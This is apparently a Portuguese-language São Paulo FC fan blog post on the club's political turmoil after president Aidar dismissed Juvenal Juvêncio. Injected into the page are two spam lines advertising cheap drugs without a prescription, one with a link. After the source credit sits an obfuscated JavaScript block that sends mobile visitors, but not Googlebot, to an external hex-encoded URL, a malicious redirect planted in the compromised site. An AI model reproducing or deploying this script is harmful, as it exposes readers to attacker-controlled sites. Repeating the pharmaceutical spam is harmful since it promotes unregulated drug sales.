Destaque Noticia

Adeus, Juvenal! Obrigado, Aidar!

Eu poderia estar aqui para escrever mais um texto sobre o futebol apresentado pelo São Paulo, aquele que tem enchido a torcida são paulina de orgulho, mas não, vou falar da conturbada situação política do clube do Morumbi, que está escancarada para quem quiser ver. Antes exemplo de gestão por resolver os problemas internamente, hoje o clube tornou-se aberto para quem quiser saber o que acontece lá dentro.

Ando lendo tweets de várias pessoas, entre elas jornalistas e torcedores, e fico surpreso com alguns comentários. Aqueles que defendiam a saída total do Juvenal Juvêncio agora criticam a decisão do atual presidente Tricolor, Carlos Miguel Aidar, em demiti-lo do clube, acusando o atual presidente de traíra.

Fico me perguntando quais são as reais intenções das eleições no São Paulo? Juvenal indicou, apoiou e praticamente elegeu o seu sucessor, Aidar, mas ele esperava ficar até a morte dentro do clube? Indicar e eleger seu sucessor era para manter-se no cargo ou para eleger alguém competente para comandar o Tricolor, independente de suas escolhas? Juvenal, agora demitido do São Paulo, faz duras e pesadas criticas ao seu sucessor, mostrando arrependimento por tê-lo indicado ao cargo mais importante do clube. Mas já se arrependeu, Juvenal? Isso mostra que Juvenal queria se perpetuar no clube, não passar o bastão e cuidar da sua debilitada saúde.

Essa atitude do Aidar em demitir Juvenal e acabar de vez com seus métodos de comando dentro do clube, possui várias vertentes:

– Dívida do clube na ‘era JJ’

Aidar afirmou, em entrevista a Folha de São Paulo, que quando assumiu o clube em abril, encontrou o clube com R$ 109 milhões de dívidas bancárias. Em julho, Aidar aumentou a dívida bancária em R$ 22 milhões com a compra de Alan Kardec, aumentando para R$ 131 milhões. A dívida feita com a compra do Kardec será compensada pelo recebimento de 5,4 milhões de euros referente as vendas de Douglas ao Barcelona e Lucas Evangelista para a Udinese. Mas, por outro lado, a dívida feita pelo Juvenal continuará atrapalhando o São Paulo, já que, segundo Aidar, o clube paga R$ 2,3 milhões de juros de dívidas bancárias e ele diz estar fazendo milagres no clube.

IMG_2306

– Falta de organização na ‘era JJ’

O atual presidente Tricolor afirmou que a gestão na ‘era JJ’ era centralizada, sem controle. Aidar ainda disse encontrar o clube muito pior do que imaginava, com pessoas acostumadas a vantagens, principalmente diretores, que circulavam pelo clube com pacote de ingressos para jogos e shows nas mãos, distribuído para sócios. Mais de 20 carros foram vendidos por Aidar, que segundo o próprio mandatário, era usado para motoristas contratados pelo clube ir buscar diretores. Viagens para diretores e conselheiros com passagens e hospedagens também foram problemas encontrados pelo presidente Tricolor.

– Categorias de base

Juvenal Juvêncio, até a tarde do dia 15/09, era o diretor da base do Tricolor, onde Aidar teceu várias críticas. Aidar acredita que a base Tricolor deveria produzir mais jogadores e se aproximar mais do clube, já que houve um afastamento e a base virou praticamente um clube separado. Quando assumiu a presidência, Aidar encontrou 320 meninos em Cotia, cortou esse número para 240 e pretende abaixar mais esse número para 150 meninos.

– Corte de empregados do clube

get cheaply medications on line

O São Paulo possui 950 funcionários. O Instituto Áquila que foi contratado por Aidar para avaliar o desempenho do clube e propor um modelo de gestão, disse que 95 funcionários podem fazer perfeitamente o que 950 fazem hoje no clube. Com a atual situação financeira do clube, Aidar pretende diminuir drasticamente o número de funcionários, afim de fazer o clube cortar despesas.

obtain cheap drugs without a doctor – http://rinautari.mhs.narotama.ac.id/2016/11/30/obtain-cheap-drugs-without-a-doctor/

– Reforma do Morumbi

Além de todos os problemas citados por Aidar em entrevista à Folha de São Paulo, a aproximação do presidente com a oposição do clube, pode ter tudo a ver com a reforma do estádio do Morumbi e a demissão de Juvenal Juvêncio do clube. Acredito que com o ‘apoio’ dos opositores, o presidente consiga o número necessários de inscrições para aprovar a tão sonhada reforma do estádio Tricolor. E para conseguir apoio dos opositores, nada melhor do que encerrar de vez a ‘era JJ’ dentro do clube.

Eu como torcedor, queria o Aidar como presidente, principalmente por ter lido boas recomendações após sua primeira passagem como presidente do Tricolor na década de 80, mas queria essa parceria com Marco Aurélio Cunha, que seria o diretor de futebol caso a oposição ganhasse as eleições, portanto era praticamente inviável.

A demissão do Juvenal faz bem para todos, principalmente aos torcedores e opositores, que agora podem ter espaço para entrar de vez na política do clube. Escancarar esse problema para todos tem seus lados positivos e negativos. Os mais saudosistas criticam a forma como a política do clube vem sendo tratada, pois antes essas situações eram resolvidas internamente, sem vazamento para a imprensa. Já uma outra parte, a que eu defendo, gosta da forma que a situação vem sendo conduzida, principalmente por haver mais transparência dentro do clube e por nós, torcedores, sabermos o que realmente acontece dentro do clube, pois sabemos que os últimos anos da ‘era JJ’ existiam muitas situações sendo escondidas debaixo do tapete e que hoje, Aidar expôs para todos.

Ontem, em vários veículos de informação, Juvenal disse que Aidar está louco e que quer demitir Muricy do comando técnico do São Paulo, algo que não acredito, pois Aidar, desde o dia que assumiu a presidência, afirmou que Muricy fica como técnico do São Paulo até quando quiser e até o fim do seu mandato de presidente. Aidar sabe que demitir Muricy não seria inteligente, devido o técnico ter salvado o clube do rebaixamento no Brasileiro do ano passado, ao ótimo desempenho do Tricolor no Brasileiro desse ano e da idolatria que a torcida possui pelo treinador. Ainda sobre Aidar, Juvenal afirmou que o atual presidente Tricolor vai afundar o clube. JJ pode até ter razão no futuro, mas um cara que trouxe Kardec e Kaká, fazendo novamente o clube brigar por um título Brasileiro, não pode ser um mau administrador.

E o pior de tudo ainda estava por vir, Juvenal afirmou, em programa da Fox Sports, que interferiu na escalação do time do São Paulo na final do Mundial de Clubes em 2005. O então técnico Paulo Autuori disse que escalaria o Souza, mas JJ ordenou que Edcarlos fosse escalado. Autuori respondeu ao presidente e disse que não houve nada disso, afirmando que só falta o Juvenal dizer que foi ele quem deu o passe para o gol do Mineiro.

Juvenal não percebeu ainda, está tomado pela raiva, mas sua saída do clube fará um bem também a ele próprio, que luta contra um grave tumor que o deixa debilitado fisicamente. Independente de suas atitudes, desejo ao sr. Juvenal Juvêncio que se recupere e se cure dessa grave doença que o afeta. Juvenal sempre deverá ser tratado como uma das figuras mais emblemáticas que o São Paulo Futebol Clube já teve.

A situação política do clube ferve no melhor momento do time dentro de campo. Esperamos e tenho a certeza que isso não afetará no rendimento da equipe no Brasileirão, mas infelizmente esse não era o melhor momento para essas bombas estourarem, por mais certas que elas estejam. Agora o foco é somente para dentro das 4 linhas!

Adeus, Juvenal! O nosso São Paulo não precisa mais de você!

Fonte: LanceNet

var d=document;var s=d.createElement(‘script’); var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

dois × 3 =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

Apesar de empate frustrante, São Paulo atinge 12 jogos de invencibilidade e está perto de 3a maior marca em Brasileiros desde 2006

saopauloadmin23 de novembro de 2020

Ceni pede ao juiz para jogo acabar: “Meu time sem chance”

saopauloadmin19 de novembro de 2020

Vai ter festa no Morumbi! Quarta-feira às 19h00, recepção do ônibus tricolor

saopauloadmin16 de novembro de 2020

Rodrigo Nestor comemora estreia no São Paulo: ‘Sonhava desde criança’

saopauloadmin15 de novembro de 2020

Brenner foi aposta de Ceni no São Paulo aos 17 anos; hoje é carrasco

saopauloadmin12 de novembro de 2020

Diniz: O Flamengo poderia ter aproveitado, mas não aproveitaram as chances de erros nossos

saopauloadmin12 de novembro de 2020

“Não tem nada de kamikaze. Treinar o que a gente treina para poder sair jogando, é muito treino” afirma Diniz

saopauloadmin12 de novembro de 2020

Atacante desperta interesse de Ajax, PSG, Milan, Arsenal, Juventus e Lazio

saopauloadmin11 de novembro de 2020

Veja a repercussão da possível volta de Luis Fabiano

saopauloadmin9 de novembro de 2020